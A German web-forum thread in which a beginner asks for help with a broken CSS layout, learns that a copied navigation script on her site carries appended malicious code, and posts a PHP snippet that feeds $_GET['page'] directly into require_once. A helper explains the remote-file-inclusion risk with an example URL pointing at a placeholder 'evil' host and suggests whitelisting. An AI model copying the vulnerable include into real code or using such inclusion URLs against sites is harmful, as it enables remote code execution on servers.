Text total chaotisch -> AM VERZWEIFELN

Hallo zusammen,

ich habe leider ein kleines Problem und sitze hier jetzt schon seit einigen Stunden fest :ps: :motz: Wenn man eine Kategorie anklickt sieht der Inhalt sehr durcheinander aus, man kann fast nichts mehr erkennen!
Die Seite soll bald ONLINE gehen und ich muss dringend eine Lösung finden.
:whata: :whata: :whata: :whata:

Ich schicke euch mal den Link damit ihr sehen könnt was ich meine
LINK ENTFERNT

Das ist eine Kategorie und in der sollen nochmal Unterkategorien stehen…original sieht so aus
LINK ENTFERNT

Bitte nicht über Fehler oder sonstiges wundern, die Seite ist noch nicht fertig!!
Es geht mir erst mal darum dieses Chaos wieder in Ordnung zu bringen.

Ich hoffe mir kann jemand helfen, ich wäre sehr dankbar.

Mit freundlichen Grüßen

Melissa

Ich werde vor Schadsoftware gewarnt :susp:

OOH man, jetzt auch das noch.
Ich weiß echt nicht warum meine Seite als schädlich eingestuft wird!??!

Normalerweise kommt die Meldung bei mir nicht mehr und auch einige Freunde von mir haben es getestet und da kam keine Meldung mehr.
Wurde damals auch von Google in den Suchergebnissen gesperrt, weil meine Seite angeblich schädlich ist!

Vielleicht dauert es etwas bis diese Meldung bei jedem verschwindet??
Denn in Google ist auch keine Sperre mehr drine.

WOran kann das liegen, ich weiß echt nicht mehr weiter… :neutral_face: :neutral_face: :neutral_face:

Mir wird mit wehenden Fahnen davon abgeraten, deine Seite zu öffnen. Hab ich jetzt trotzdem mal. Avast meldet einen Virus in der Datei gradualfader.js - ich kann sie nicht aufrufen, möglicherweise deshalb. Darf man wissen, was da drin ist? Kann sich da was eingeschlichen haben? (Quellcode?)

Mfg :wink2:

das “position: absolute;” in .style2 verhunzt dir das layout…

Es wirkt so als hättest du versucht einfach überall “position: absolute” einzufügen, ohne wirklich zu wissen was es macht. Hast du dir mal ein CSS Tutorial angeschaut und immer schön jedes genutzte attribut in einer referenz nachgeschlagen und verstanden?

Edit: ach und, ich hab einen horizontalen Scrollbalken. Mein Monitor scheint nicht so breit zu sein wie deiner (oder es ist irgendein verhunztes CSS, dass es so breit werden lässt).

Das wird aber sicher nicht dein einziges Problem bleiben.

[quote=„Mgier“] Avast meldet einen Virus in der Datei gradualfader.js - ich kann sie nicht aufrufen, möglicherweise deshalb. Darf man wissen, was da drin ist? Kann sich da was eingeschlichen haben? (Quellcode?)

Mfg :wink2:[/quote]

Hey sehr nett und vor allem mutig von dir, dass du meine Seite trotzdem geöffnet hast :slight_smile: ich weiß dass meine Seite keinen Virus haben kann!!!

gradualfader.js ist ein JavaScript…das verwende ich für den Effekt in meine Navigation.
Effekt -> Transparenz, wenn man mit der Maus über die Kategorien fährt.

HIER KANNST DU ES SEHEN

hier mal der Quellcode von der Datei „gradualfader.js“ - falls die wirklich so ein Problem darstellt, werde ich den Effekt herausnehmen und die Navigation mit dem „opacity“ - Effekt im css verwenden.

Das Dokument ist mit meiner Webseite verknüpft nämlich so

Hoffe das Hilft vielleicht weiter? :astonished:

LG

Melissa

[quote=„Balmung“]das „position: absolute;“ in .style2 verhunzt dir das layout…

Es wirkt so als hättest du versucht einfach überall „position: absolute“ einzufügen, ohne wirklich zu wissen was es macht. Hast du dir mal ein CSS Tutorial angeschaut und immer schön jedes genutzte attribut in einer referenz nachgeschlagen und verstanden?

Edit: ach und, ich hab einen horizontalen Scrollbalken. Mein Monitor scheint nicht so breit zu sein wie deiner (oder es ist irgendein verhunztes CSS, dass es so breit werden lässt).

Das wird aber sicher nicht dein einziges Problem bleiben.[/quote]

Ja den Validator-Check habe ich auch schon mal gemacht, werde auch noch daran arbeiten.
Nur viele Fehler sind meistens fehlender „alt“ text usw.

Ja ich muss mir das nochmal anschauen glaube ich :ps: :ps: werde ich auch nochmal schleunigst tun!!!
Für dein Feedback bin ich sehr dankbar :slight_smile:

Welch ein Unsinn. Das stückchen javascript am ende deines scriptes schaut jedenfalls sehr verdächtig aus.

EDIT3, wegen übersensiblem virenscanner entfernt. tz.

Welch ein Unsinn. Das stückchen javascript am ende deines scriptes schaut jedenfalls sehr verdächtig aus.[/quote]

Okay … :susp:

Reicht es wenn ich diese Datei entferne bzw. alles davon lösche?
Ich kann es ja mal machen & ihr könnt mir sagen ob noch eine Fehlermeldung angezeigt wird oder nicht.

Oder was schlagt ihr noch vor?

LG

Melissa

Wäre zumindest schon mal schön, wenn du hier im forum den beitrag editierst, und den gaaanz langen text entfernst, der das forum layout verhunzt. :wink:

Mein Antivirus lässt mich nicht mehr ins Forum… Du solltest ein bisschen(!) darauf acht geben, welche Scripte du kopierst. Avast meldet JS include, online Dienste ähnliches.

Mensch jetzt verhunze ich schon das Forum :wink: :ps: , habs editiert wie man sehen kann :slight_smile:

Also ich habe das jetzt von meiner Seite entfernt, war sowieso überflüssig da reicht auch schon „opacity“ als Effekt aus.

Vielleicht bin ich ja jetzt schon ein Stückchen weitergekommen, hoffe das war die Ursache! Nicht dass sich die Ursache als noch komplizierter entpuppt durchdreh :motz:

Am Rest kann man arbeiten… :ps:

Welch ein Unsinn. Das stückchen javascript am ende deines scriptes schaut jedenfalls sehr verdächtig aus.

Wer zum Teufel ist “manfredschappe” ??? Wie kommt sowas zustande? Das ist eine andere Webseite die ich aber nicht kenne…

LG

Sorry, ich habe das Script entfernt. Hoffe es ist jetzt wieder alles ok… ?

Auf deiner Seite wird mir nichts mehr gemeldet, nur hier im Beitrag spielt Avast noch Wachhund und schlägt auf den Codeausschnitt oben an. Eventuell wäre es ratsam, ihn nach Lösung/Aufklärung wieder zu entfernen.

Mfg :wink2:

edit: Interessant wäre noch, wo du das Teil herbekommen hast, ob der Schadcode schon von Anfang an drin war.

[quote=„Mgier“]Auf deiner Seite wird mir nichts mehr gemeldet, nur hier im Beitrag spielt Avast noch Wachhund und schlägt auf den Codeausschnitt oben an. Eventuell wäre es ratsam, ihn nach Lösung/Aufklärung wieder zu entfernen.

Mfg :wink2:

edit: Interessant wäre noch, wo du das Teil herbekommen hast, ob der Schadcode schon von Anfang an drin war.[/quote]

Schonmal ein großes Danke ! :slight_smile:
Genau da wo ich es eigentlich NICHT erwartet habe.

Diese Scripts bekommt man auf Dynamicdrive.com her, ich benutze auch eines davon für meine Slideshow die man links sehen kann.

Habe das Script gerade auf der Seite (dynamicdrive) überprüft und diese ganzen Zahlen die bei mir am Ende standen, sind im Originalscript nicht mit enthalten…was heißt das?

Habe den Code schon gelöscht hier im Forum, passt jetzt alles oder? :slight_smile:

Habe noch eine Frage, könntest du mal schauen ob dieser Code stimmt? Ob da vielleicht auch was überflüssig ist oder noch ergänzt werden muss …? Geht einfach darum, dass ich keine Iframes mehr verwenden möcht, da sie ja auch schon sehr veraltet sind.
Deswegen habe ich damals angefangen mich mit PHP auseinander zu setzen, wobei ich immer noch kein Profi bin…geht drum dass der Inhalt der Kategorien auch genau da angezeigt werden wo meine Artikel stehen.

<?PHP
if(isset($_GET['page']))
{
$link = $_GET['page'];
$link = $link.".php";
require_once($link);
}
elseif($_GET['page'] == "christina")
{
require_once($link);
}
else
{
$number=11;
$link = 'index';
$link = $link.".php";
$template="asian_vibe";
require_once('/users/xtina-fanatic/www/news/show_news.php');
}
?>

LG

Melissa

In deinem Beitrag oben befindet sich noch Schadcode, darauf schlägt Avast an. Mich würds ne stören, aber ich schätze bplaced störts :wink:
Bin auch kein Profi, aber:

[quote]$link = $_GET[‚page‘];
$link = $link.".php";
require_once($link);[/quote]

Das was du da veranstaltest ist problematisch bis fahrlässig. Ein Beispiel: Jemand ruft deine Seite mit deineseite.tld/?page=http://meine-boese-seite.tld/mein-boeses-script auf. Dein Skript ergänzt dann kulanterweise das .php und inkludiert dann das Skript http:// meine-boese-seite.tld/mein-boeses-script.php - also ein komplett fremdes Script wird hier ausgeführt. Damit kann dann derjenige alles Mögliche anstellen - im harmlosesten Fall löscht er deine Seite.
Deswegen sind Daten vom Benutzer immer zu überprüfen.

Mfg :wink2:

OHJEEE :neutral_face:
Was mache ich jetzt am Besten?
Ich möchte kein Wordpress oder sonstige vorgefertigte Sachen benutzen.

Wie wäre der Code denn richtig?
Ich möchte, dass wenn man z.B. auf die Kategorie “Christina Aguilera” klickt, der INhalt genau da erscheint wo sonst auch meine Aritkel stehen.
Man kann das auch ganz primitiv mit einem IFrame machen, aber das gefällt mir so gar nicht!

PS: Ein Teil von diesem Code ist ja von “cutenews” das Newssystem was ich eingebunden habe, das habe ich per “integration wizard” eingefügt. Somit gehe ich auch davon aus, dass der andere Teil des Codes stimmt.

LG

Wie ich sehe hast du ihn schon rausgenommen :smiley:
Vielleicht hätte das so eh nicht funktioniert, aber vielleicht ist in solchen Dingen meist zu wenig. Du könntest zum Beispiel einfach überprüfen, ob das in $_GET[‚page‘] drin steht, was drin stehen soll:

if($_GET['page'] == 'abc')
{
  require('abc.php');
}

Damit weißt du ja dann, dass das was drin steht von dir so gewollt ist. Je nach deinem Wissensstand kannst du das ja dann auch mit einem Array umsetzen oder ähnliches - aber wie gesagt - ich bin auch kein Profi. Aber nur wenn du jede Benutzereingabe prüfst bist du auf der sicheren Seite.

In der Hoffnung dass ich keinen Blödsinn verzapfe - Mfg :wink2:

Gut! :slight_smile:
Ihr habt mir trotzdem schon sehr weitergeholfen :hail: :hail: finde ich super!

Ich werde jetzt mal ins Bett gehen & mich morgen voll konzentriert an die Sache ran machen.
Das mit dem PHP Script krieg ich schon irgendwie hin.

Nochmals ein großes danke :slight_smile:

LG

Melissa